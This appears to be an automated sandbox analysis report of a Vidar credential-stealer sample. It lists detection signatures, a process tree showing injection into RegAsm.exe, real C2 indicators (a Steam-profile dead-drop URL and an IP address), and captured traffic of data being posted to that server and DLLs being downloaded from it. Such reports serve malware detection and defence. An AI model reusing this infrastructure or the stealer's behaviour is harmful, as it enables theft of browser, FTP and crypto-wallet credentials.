Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1428826
MD5:b841d5f5e8102ee6ac56d565fbb58879
SHA1:972f4ba09920b0512769f9eb1923da2d8b0b9470
SHA256:e3d540df89c42080e0d44ae13d7687f5ec5dd178128cb9831eefddc742f2cf3e
Tags:exe
Infos:

Detection

Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Yara detected AntiVM3
Yara detected Vidar
Yara detected Vidar stealer
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Searches for specific processes (likely to inject)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 7448 cmdline: "C:\Users\user\Desktop\file.exe" MD5: B841D5F5E8102EE6AC56D565FBB58879)
    • conhost.exe (PID: 7456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegAsm.exe (PID: 7508 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • RegAsm.exe (PID: 7516 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • RegAsm.exe (PID: 7524 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • RegAsm.exe (PID: 7532 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Vidar

{"C2 url": ["https://steamcommunity.com/profiles/76561199673019888"]}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_Vidar_2Yara detected VidarJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
      00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
        00000005.00000002.2066860045.00000000015CA000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: file.exe PID: 7448JoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
            Process Memory Space: RegAsm.exe PID: 7532JoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
              Click to see the 2 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.3eeac0.1.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                0.2.file.exe.3eeac0.1.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                  5.2.RegAsm.exe.400000.0.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                    5.2.RegAsm.exe.400000.0.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                      0.2.file.exe.3c0000.0.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security

                        Sigma Signatures

                        No Sigma rule has matched

                        Snort Signatures

                        No Snort rule has matched

                        Joe Sandbox Signatures

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Antivirus / Scanner detection for submitted sample
                        Source: file.exeAvira: detected
                        Found malware configuration
                        Source: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmpMalware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199673019888"]}
                        Machine Learning detection for sample
                        Source: file.exeJoe Sandbox ML: detected
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00411720 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,5_2_00411720
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00406FD0 CryptUnprotectData,LocalAlloc,LocalFree,5_2_00406FD0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00409230 memset,lstrlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,PK11_FreeSlot,lstrcat,PK11_FreeSlot,lstrcat,5_2_00409230
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00406F50 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,5_2_00406F50
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_6C806C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,5_2_6C806C80
                        Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: unknownHTTPS traffic detected: 184.30.122.179:443 -> 192.168.2.4:49730 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 37.27.87.155:443 -> 192.168.2.4:49731 version: TLS 1.2
                        Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                        Source: Binary string: mozglue.pdbP source: RegAsm.exe, 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmp, mozglue.dll.5.dr, mozglue[1].dll.5.dr
                        Source: Binary string: freebl3.pdb source: freebl3.dll.5.dr, freebl3[1].dll.5.dr
                        Source: Binary string: freebl3.pdbp source: freebl3.dll.5.dr, freebl3[1].dll.5.dr
                        Source: Binary string: nss3.pdb@ source: RegAsm.exe, 00000005.00000002.2076099435.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.5.dr, nss3[1].dll.5.dr
                        Source: Binary string: softokn3.pdb@ source: softokn3.dll.5.dr, softokn3[1].dll.5.dr
                        Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140[1].dll.5.dr, vcruntime140.dll.5.dr
                        Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.5.dr, msvcp140[1].dll.5.dr
                        Source: Binary string: nss3.pdb source: RegAsm.exe, 00000005.00000002.2076099435.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.5.dr, nss3[1].dll.5.dr
                        Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000005.00000002.2067654548.0000000013EDC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2071622933.0000000019E48000.00000002.00001000.00020000.00000000.sdmp, sqln[1].dll.5.dr
                        Source: Binary string: mozglue.pdb source: RegAsm.exe, 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmp, mozglue.dll.5.dr, mozglue[1].dll.5.dr
                        Source: Binary string: softokn3.pdb source: softokn3.dll.5.dr, softokn3[1].dll.5.dr
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003D90D1 FindFirstFileExW,0_2_003D90D1
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0040B030 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,5_2_0040B030
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004011E0 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,5_2_004011E0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0040D320 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,5_2_0040D320
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004164A0 wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcat,strtok_s,strtok_s,memset,lstrcat,strtok_s,PathMatchSpecA,wsprintfA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,FindNextFileA,FindClose,5_2_004164A0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00417550 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,5_2_00417550
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0040A530 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,5_2_0040A530
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00416CF0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,5_2_00416CF0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00417140 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,5_2_00417140
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0040A980 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,5_2_0040A980
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_004168E0 GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlen,5_2_004168E0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior

                        Networking

                        barindex
                        C2 URLs / IPs found in malware configuration
                        Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199673019888
                        Source: global trafficHTTP traffic detected: GET /profiles/76561199673019888 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                        Source: Joe Sandbox ViewIP Address: 184.30.122.179 184.30.122.179
                        Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BGIIDAEBGCAAECAKFHIIUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Content-Length: 279Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BAKFCBFHJDHJKECAKEHIUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KFCBAEHCAEGDHJKFHJKFUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AKJDGIEHCAEHIEBFBKKKUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Content-Length: 8381Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /sqln.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BFBFBFIIJDAKECAKKJEHUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Content-Length: 4677Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JJECGHJDBFIJJJKEHCBFUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Content-Length: 1529Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GDAAKFIDGIEGDGDHIDAKUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DBFCBGCGIJKJKECAKEGCUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HDBGDHDAECBGDHJKFIDGUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Content-Length: 1145Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FHCBGDAAFBKEBGDHDBKEUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HIJEGIIJDGHDGCBGHCAAUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BAKFCBFHJDHJKECAKEHIUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Content-Length: 453Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HCFIJKKKKKFCAAAAFBKFUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Content-Length: 113433Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BKFIJJEGHDAEBGCAKJKFUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HDBGDHDAECBGDHJKFIDGUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                        Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                        Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                        Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                        Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                        Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                        Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                        Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                        Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                        Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                        Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                        Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                        Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                        Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                        Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                        Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                        Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                        Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                        Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                        Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                        Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                        Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                        Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                        Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                        Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                        Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                        Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                        Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                        Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                        Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                        Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                        Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                        Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                        Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                        Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                        Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                        Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                        Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                        Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                        Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                        Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                        Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                        Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                        Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                        Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                        Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                        Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                        Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                        Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                        Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                        Source: unknownTCP traffic detected without corresponding DNS query: 37.27.87.155
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_00404500 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,5_2_00404500
                        Source: global trafficHTTP traffic detected: GET /profiles/76561199673019888 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /sqln.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Connection: Keep-AliveCache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Cache-Control: no-cache
                        Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Cache-Control: no-cache
                        Source: unknownDNS traffic detected: queries for: steamcommunity.com
                        Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BGIIDAEBGCAAECAKFHIIUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 37.27.87.155Content-Length: 279Connection: Keep-AliveCache-Control: no-cache
                        Source: nss3.dll.5.dr, nss3[1].dll.5.dr, softokn3.dll.5.dr, softokn3[1].dll.5.dr, freebl3.dll.5.dr, mozglue.dll.5.dr, freebl3[1].dll.5.dr, mozglue[1].dll.5.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                        Source: nss3.dll.5.dr, nss3[1].dll.5.dr, softokn3.dll.5.dr, softokn3[1].dll.5.dr, freebl3.dll.5.dr, mozglue.dll.5.dr, freebl3[1].dll.5.dr, mozglue[1].dll.5.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                        Source: nss3.dll.5.dr, nss3[1].dll.5.dr, softokn3.dll.5.dr, softokn3[1].dll.5.dr, freebl3.dll.5.dr, mozglue.dll.5.dr, freebl3[1].dll.5.dr, mozglue[1].dll.5.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                        Source: nss3.dll.5.dr, nss3[1].dll.5.dr, softokn3.dll.5.dr, softokn3[1].dll.5.dr, freebl3.dll.5.dr, mozglue.dll.5.dr, freebl3[1].dll.5.dr, mozglue[1].dll.5.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                        Source: nss3.dll.5.dr, nss3[1].dll.5.dr, softokn3.dll.5.dr, softokn3[1].dll.5.dr, freebl3.dll.5.dr, mozglue.dll.5.dr, freebl3[1].dll.5.dr, mozglue[1].dll.5.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                        Source: nss3.dll.5.dr, nss3[1].dll.5.dr, softokn3.dll.5.dr, softokn3[1].dll.5.dr, freebl3.dll.5.dr, mozglue.dll.5.dr, freebl3[1].dll.5.dr, mozglue[1].dll.5.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
